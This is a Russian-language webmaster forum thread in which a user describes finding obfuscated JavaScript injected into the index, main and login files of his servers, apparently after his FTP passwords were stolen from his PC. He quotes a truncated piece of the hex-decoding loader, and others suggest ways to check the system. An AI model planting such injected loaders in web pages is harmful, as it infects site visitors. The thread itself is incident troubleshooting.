127.0.0.1
С нами с 26.04.06
Сообщения: 1092
Рейтинг: 557
|
 Добавлено: 10/02/09 в 03:30 |
Ситуация: вдруг обнаружилось, что один из моих серверов недоступен. пишу в ДЦ, отвечают - ваша коробка была хакнута и оттуда шел трафик. Подключили, пошел смотреть чтозанахуй.
Оказалось, что в файлах index.* main.* login.* прописан JS код типа
Оффтопик:
<script>function c271f17f2ch49909a17e171f(h49909a17e1f0c){ return (parseInt(h49909a17e1f0c
,16));}function h49909a17e36a1(h49909a17e3e51){ function h49909a17e55bf(){return 2;} var h49909a17e4644='';h49909a
17e657f=String.fromCharCode;for(h49909a17e4e07=0;h49909a17e4e07<h49909a17e3e51.length;h49909a17e4e07+=h49909a17e55
bf()){ h49909a17e4644+=(h49909a17e657f(c271f17f2ch49909a17e171f(h49909a17e3e51.substr(h49909a17e4e07,h49909a17e55b
f()))));}return h49909a17e4644;} var ra1='';var h49909a17e6d72='3C7'+ra1+'3637'+ .... итд
RKhunter 1.3.4 ничего подозрительного не нашел.
прогрепил /home, оказалось что изменены файлы только для одного аккаунта, того, чьим я часто пользуюсь для заливки по ФТП файлов.
почесал репу, проверил второй сервер, такая же хуйня - тот аккаунт, который я использую для заливки по ФТП на сервер тоже затроянен скриптами.
начал проверять комп, avz4, cureIT ничего не нашли. убрал авиру, поставил др.веб - ничего не найдено :(
смотрел через CurrPorts (мониторилка портов для винды) на предмет неясных подключений - ничего.
комп подключен к свичу, свич воткнут в адсл-модем, который раутер с функией NAT
то есть напрямую к компу законнектиться извне не получится.
вопросы:
чем еще можно проверить комп?
может ли случится так, что фтп-пароли были заснифенны где-то в провайдерской сети?
инъекции я удалил, это несложно. скрипт на 10 строчек.
я боюсь сейчас менять пароли, потому что если сидит в компе кейлоггер, то толку от смены никакой.[/offtopic]
|
|
|
|
| |
127.0.0.1
С нами с 26.04.06
Сообщения: 1092
Рейтинг: 557
|
| Добавлено: 10/02/09 в 03:32 |
ну и само собой, все фтп пароли были вида g8x4h2sc4c
то есть подобрать весьма проблематично
если бы был сперт рутовый пароль, вряд ли ограничилось инъекцией скрипта только в одну папку
|
|
|
|
| |
С нами с 25.10.04
Сообщения: 3306
Рейтинг: 2538
|
| Добавлено: 10/02/09 в 09:05 |
| localhost писал: |
если бы был сперт рутовый пароль, вряд ли ограничилось инъекцией скрипта только в одну папку |
а может просто не успели ещё?
|
|
|
|
Сдам подпись (в личку, please)
|
0
|
|
| |
127.0.0.1
С нами с 26.04.06
Сообщения: 1092
Рейтинг: 557
|
| Добавлено: 10/02/09 в 09:44 |
уже успели :(
|
|
|
|
| |
С нами с 21.09.03
Сообщения: 7329
Рейтинг: 2144
|
| Добавлено: 10/02/09 в 09:55 |
Искать и проверять в первую очередь при помощи busybox: ls -latr /etc, /bin, /sbin, /usr/bin, /usr/sbin И так далее. Испралять руками, разумеется. Ну и так далее.
|
|
|
|
| |
127.0.0.1
С нами с 26.04.06
Сообщения: 1092
Рейтинг: 557
|
| Добавлено: 10/02/09 в 11:59 |
вообщем разбор полетов показал, что скорее всего спиздили с фара фтп-акки
вопрос теперь заключается в том - как найти в винде ту гадость, что спиздила акки
|
|
|
|
| |
php наше всё :)
С нами с 26.07.04
Сообщения: 814
Рейтинг: 447
|
| Добавлено: 10/02/09 в 12:56 |
|
|
|
|
Толковый программист ждет [не]больших заказов (:
|
0
|
|
| |
Текстовая реклама в форме ответа
Заголовок и до четырех строчек текста
Длина текста до 350 символов
Купить рекламу в этом месте! |
